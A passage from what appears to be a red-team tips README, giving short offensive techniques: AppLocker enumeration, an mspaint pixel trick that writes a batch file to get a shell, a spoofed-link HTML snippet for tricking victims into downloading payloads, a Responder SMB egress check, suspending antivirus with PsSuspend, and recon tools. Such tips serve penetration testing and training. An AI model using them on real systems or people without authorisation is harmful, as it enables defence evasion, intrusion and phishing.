1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 
0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="(Get-AppLockerPolicy -Local).RuleCollections
Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\"><pre class="notranslate"><code>(Get-AppLockerPolicy -Local).RuleCollections
Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\
</code></pre></div> <p dir="auto"><strong>Description:</strong> <em>'AppLocker can be a pain. Enumerate to see how painful'</em></p> <p dir="auto"><strong>Note:</strong> These are three separate commands, run one at a time (earlier copies of this page collapsed them onto one line, which does not parse). <code>-Local</code> shows only the locally configured policy; <code>Get-AppLockerPolicy -Effective</code> returns the merged policy that actually applies (local plus domain GPO), and <code>-Xml</code> on either gives a readable dump. The <code>SrpV2</code> registry keys hold the same rules and are the fallback when the AppLocker module cannot be loaded. Finally, rules are only enforced while the Application Identity service (<code>AppIDSvc</code>) is running, so check its state as part of the same enumeration.</p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/alh4zr3d/status/1614706476412698624" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>CMD shortcut with 6 pixels via mspaint</h3><a id="user-content-cmd-shortcut-with-6-pixels-via-mspaint" class="anchor" aria-label="Permalink: 🔙CMD shortcut with 6 pixels via mspaint" href="#cmd-shortcut-with-6-pixels-via-mspaint"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 
2.83Z"></path></svg></a></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/223849011-24db49d7-37b0-4dad-a7a6-db046f6cb7da.png"><img src="https://user-images.githubusercontent.com/100603074/223849011-24db49d7-37b0-4dad-a7a6-db046f6cb7da.png" alt="image" style="max-width: 100%;"></a></p> <ol dir="auto"> <li>Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels</li> <li>Zoom in to make the following tasks easier</li> <li>Using the colour picker, set pixels values to (from left to right): <ul dir="auto"> <li>1st: R: 10, G: 0, B: 0</li> <li>2nd: R: 13, G: 10, B: 13</li> <li>3rd: R: 100, G: 109, B: 99</li> <li>4th: R: 120, G: 101, B: 46</li> <li>5th: R: 0, G: 0, B: 101</li> <li>6th: R: 0, G: 0, B: 0</li> </ul> </li> <li>Save it as 24-bit Bitmap (<em>.bmp;</em>.dib)</li> <li>Change its extension from bmp to bat and run.</li> </ol> <p dir="auto"><strong>Description:</strong> <em>'An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. 
Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://www.pentestpartners.com/" rel="nofollow">PenTestPartners</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/#gainingacommandshell" rel="nofollow">Blog</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Link spoofing with PreventDefault JavaScript method</h3><a id="user-content-link-spoofing-with-preventdefault-javascript-method" class="anchor" aria-label="Permalink: 🔙Link spoofing with PreventDefault JavaScript method" href="#link-spoofing-with-preventdefault-javascript-method"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/223849419-c65fec83-ca1c-4a20-ac06-ec2de537a748.png"><img src="https://user-images.githubusercontent.com/100603074/223849419-c65fec83-ca1c-4a20-ac06-ec2de537a748.png" alt="image" style="max-width: 100%;"></a></p> <div class="highlight highlight-text-html-basic notranslate position-relative overflow-auto" 
dir="auto" data-snippet-clipboard-copy-content="<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>PreventDefault Example</title> </head> <body> <a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a> </body> </html>"><pre><span class="pl-c1"><!DOCTYPE html<span class="pl-kos">></span></span> <span class="pl-kos"><</span><span class="pl-ent">html</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">head</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">meta</span> <span class="pl-c1">charset</span>="<span class="pl-s">UTF-8</span>"<span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">title</span><span class="pl-kos">></span>PreventDefault Example<span class="pl-kos"></</span><span class="pl-ent">title</span><span class="pl-kos">></span> <span class="pl-kos"></</span><span class="pl-ent">head</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">body</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">a</span> <span class="pl-c1">href</span>="<span class="pl-s">https://google.com</span>" <span class="pl-c1">onclick</span>="<span class="pl-s">event.preventDefault(); window.location.href = 'https://bing.com';</span>"<span class="pl-kos">></span>Go to Google<span class="pl-kos"></</span><span class="pl-ent">a</span><span class="pl-kos">></span> <span class="pl-kos"></</span><span class="pl-ent">body</span><span class="pl-kos">></span> <span class="pl-kos"></</span><span class="pl-ent">html</span><span class="pl-kos">></span></pre></div> <p dir="auto"><strong>Description:</strong> <em>Threat actors have been observed using this technique to trick victims into clicking spoofed in-page malware download links. 
Using the PreventDefault JavaScript method you can spoof the hover link to display a legit link <code>google.com</code>, but once clicked the victim will be redirected to your malicious link <code>bing.com</code>. Great for getting victims to download payloads via a controlled site.</em></p> <p dir="auto"><strong>Link:</strong> <a href="https://developer.mozilla.org/en-US/docs/Web/API/Event/preventDefault" rel="nofollow">PreventDefault Docs</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Check SMB firewall rules with Responder</h3><a id="user-content-check-smb-firewall-rules-with-responder" class="anchor" aria-label="Permalink: 🔙Check SMB firewall rules with Responder" href="#check-smb-firewall-rules-with-responder"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/229650380-b651cfc4-896f-4429-b7b4-54d1241a5b39.png"><img src="https://user-images.githubusercontent.com/100603074/229650380-b651cfc4-896f-4429-b7b4-54d1241a5b39.png" alt="image" style="max-width: 100%;"></a></p> <div class="highlight highlight-source-powershell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Copy-Item -Path "C:\tmp\" -Destination 
"\\<ip_running_responder>\c$""><pre><span class="pl-c1">Copy-Item</span> <span class="pl-k">-</span>Path <span class="pl-s"><span class="pl-pds">"</span>C:\tmp\<span class="pl-pds">"</span></span> <span class="pl-k">-</span>Destination <span class="pl-s"><span class="pl-pds">"</span>\\<ip_running_responder>\c$<span class="pl-pds">"</span></span></pre></div> <p dir="auto"><strong>Description:</strong> <em>'When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: <code>Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"</code>. If Responder could capture the hash, the firewall allows outgoing SMB connections'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/malmoeb" rel="nofollow">@malmoeb</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/malmoeb/status/1628272928855826433" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Disable AV with SysInternals PsSuspend</h3><a id="user-content-disable-av-with-sysinternals-pssuspend" class="anchor" aria-label="Permalink: 🔙Disable AV with SysInternals PsSuspend" href="#disable-av-with-sysinternals-pssuspend"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer" 
href="https://private-user-images.githubusercontent.com/100603074/238468403-4519f5ad-c177-4550-b9af-238fa73ad66e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NDAzLTQ1MTlmNWFkLWMxNzctNDU1MC1iOWFmLTIzOGZhNzNhZDY2ZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03MTI5N2QxZGYwY2VhNjNlNzAwZTgzYjI1MzE2MzY5ODc3OWVjZjVlOTU4NmMxYWI1NjIzNzVmMTYxMGY3MWEyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.hqYRc3EoxgaMMv4MaaqzB1S-PLT9acQhpp7EWXMYDuY"><img src="https://private-user-images.githubusercontent.com/100603074/238468403-4519f5ad-c177-4550-b9af-238fa73ad66e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NDAzLTQ1MTlmNWFkLWMxNzctNDU1MC1iOWFmLTIzOGZhNzNhZDY2ZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03MTI5N2QxZGYwY2VhNjNlNzAwZTgzYjI1MzE2MzY5ODc3OWVjZjVlOTU4NmMxYWI1NjIzNzVmMTYxMGY3MWEyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.hqYRc3EoxgaMMv4MaaqzB1S-PLT9acQhpp7EWXMYDuY" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><strong>Description:</strong> <em>Using the Microsoft Sysinternals tool PsSuspend.exe it's possible to suspend some AV service executables. 
The Microsoft-signed tool takes the PID or image name of a running process and suspends it via the NtSuspendProcess Windows API.</em></p> <p dir="auto"><strong>Note:</strong> <em>Suspending is not the same as disabling. The caller needs enough rights to open the target with PROCESS_SUSPEND_RESUME (in practice local administrator), and services running as protected processes (PPL) — Microsoft Defender's MsMpEng.exe, for example — refuse that handle from an unprotected caller, so which products are affected is vendor-specific and should be verified on a test host first. A suspended AV service is also easy for a defender to notice and to resume (<code>pssuspend -r</code>), and execution of Sysinternals tools is something EDRs commonly flag.</em></p> <p dir="auto"><strong>Related Blog Post:</strong> <a href="https://medium.com/@a-poc/process-suspension-with-pssuspend-exe-0cdf5d16a3b7" rel="nofollow">Bypassing AV via Process Suspension with PsSuspend.exe</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/0gtweet/status/1638069413717975046" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Reconnaissance</h1><a id="user-content-reconnaissance" class="anchor" aria-label="Permalink: Reconnaissance" href="#reconnaissance"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/smicallef/spiderfoot">spiderfoot</a></h3><a id="user-content-spiderfoot" class="anchor" aria-label="Permalink: 🔙spiderfoot" href="#spiderfoot"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 
1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">SpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate.</p> <p dir="auto">SpiderFoot can be used offensively (e.g. in a red team exercise or penetration test) for reconnaissance of your target or defensively to gather information about what you or your organisation might have exposed over the Internet.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz tar zxvf v4.0.tar.gz cd spiderfoot-4.0 pip3 install -r requirements.txt"><pre>wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz tar zxvf v4.0.tar.gz <span class="pl-c1">cd</span> spiderfoot-4.0 pip3 install -r requirements.txt</pre></div> <p dir="auto">For full installation instructions see <a href="https://github.com/smicallef/spiderfoot?tab=readme-ov-file#installing--running">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 ./sf.py -l 127.0.0.1:5001"><pre><span class="pl-s1">python3</span> .<span class="pl-c1">/</span><span class="pl-c1">sf</span>.<span class="pl-c1">py</span> <span class="pl-c1">-</span><span class="pl-s1">l</span> <span class="pl-c1">127.0</span><span class="pl-c1">.0</span>.<span class="pl-c1">1</span>:<span 
class="pl-c1">5001</span></pre></div> <p dir="auto">Lots of usage tutorial videos <a href="https://asciinema.org/~spiderfoot" rel="nofollow">here</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/423172581-1ce26a9e-6fa5-4987-9aea-4943b9c2efec.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTgxLTFjZTI2YTllLTZmYTUtNDk4Ny05YWVhLTQ5NDNiOWMyZWZlYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00MjM1MWI2NzMyODY2NWQyNTlkYjdiMGEyNDc2ODY2NTE4MzZiNTc1NDZmNjgwZTc2YzRkMDJjOGM3NzkxOWVkJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.RbjvoDKsExF0pa4GHnMjkgDv6pqYJrYZ2cfe9Z0y6nY"><img src="https://private-user-images.githubusercontent.com/100603074/423172581-1ce26a9e-6fa5-4987-9aea-4943b9c2efec.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTgxLTFjZTI2YTllLTZmYTUtNDk4Ny05YWVhLTQ5NDNiOWMyZWZlYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00MjM1MWI2NzMyODY2NWQyNTlkYjdiMGEyNDc2ODY2NTE4MzZiNTc1NDZmNjgwZTc2YzRkMDJjOGM3NzkxOWVkJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.RbjvoDKsExF0pa4GHnMjkgDv6pqYJrYZ2cfe9Z0y6nY" alt="spiderfoot" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/smicallef/spiderfoot">https://github.com/smicallef/spiderfoot</a></em></p> <div 
class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/six2dez/reconftw">reconftw</a></h3><a id="user-content-reconftw" class="anchor" aria-label="Permalink: 🔙reconftw" href="#reconftw"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">reconFTW automates the entire process of reconnaissance for you. 
It chains subdomain enumeration with a range of vulnerability checks to gather as much information as possible about the target.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh"><pre>git clone https://github.com/six2dez/reconftw.git<span class="pl-k">;</span><span class="pl-c1">cd</span> reconftw/<span class="pl-k">;</span>./install.sh</pre></div> <p dir="auto">For full installation instructions see <a href="https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Single target domain ./reconftw.sh -d target.com -r # One target with multiple domains ./reconftw.sh -m target -l domains.txt -r # Passive recon ./reconftw.sh -d target.com -p # Perform all checks and exploitations ./reconftw.sh -d target.com -a"><pre><span class="pl-c"><span class="pl-c">#</span> Single target domain</span> ./reconftw.sh -d target.com -r <span class="pl-c"><span class="pl-c">#</span> One target with multiple domains</span> ./reconftw.sh -m target -l domains.txt -r <span class="pl-c"><span class="pl-c">#</span> Passive recon</span> ./reconftw.sh -d target.com -p <span class="pl-c"><span class="pl-c">#</span> Perform all checks and exploitations</span> ./reconftw.sh -d target.com -a</pre></div> <p dir="auto">For full usage instructions see <a href="https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide">here</a>.</p> <p dir="auto"><strong>Note:</strong> <em>Only <code>-p</code> is the passive mode; <code>-r</code> actively probes the hosts it discovers and <code>-a</code>, as its own comment says, performs all checks and exploitation attempts, so run those modes only against domains inside the authorised scope. <code>install.sh</code> installs a number of third-party tools on the host — read it before running it on a shared or production machine.</em></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" 
href="https://private-user-images.githubusercontent.com/100603074/423172569-1a5abeb5-776d-4c10-a02c-934e1662d817.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTY5LTFhNWFiZWI1LTc3NmQtNGMxMC1hMDJjLTkzNGUxNjYyZDgxNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yYTNkOTk4ZTU1YjJkM2I2MGRmMWY0OTg1MWJjNWIwYjA4ZjlhNTEzNGMyMWRiOWQ4ODY0YzBiYTliNmJmMTQzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.4VrrzJO2w1Or-9V-RL7WLZIlGqLSIYBairYajUJmacs"><img src="https://private-user-images.githubusercontent.com/100603074/423172569-1a5abeb5-776d-4c10-a02c-934e1662d817.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTY5LTFhNWFiZWI1LTc3NmQtNGMxMC1hMDJjLTkzNGUxNjYyZDgxNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yYTNkOTk4ZTU1YjJkM2I2MGRmMWY0OTg1MWJjNWIwYjA4ZjlhNTEzNGMyMWRiOWQ4ODY0YzBiYTliNmJmMTQzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.4VrrzJO2w1Or-9V-RL7WLZIlGqLSIYBairYajUJmacs" alt="reconftw" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.youtube.com/watch?v=TQmDAtkD1Wo" rel="nofollow">https://www.youtube.com/watch?v=TQmDAtkD1Wo</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/PentestPad/subzy">subzy</a></h3><a id="user-content-subzy" 
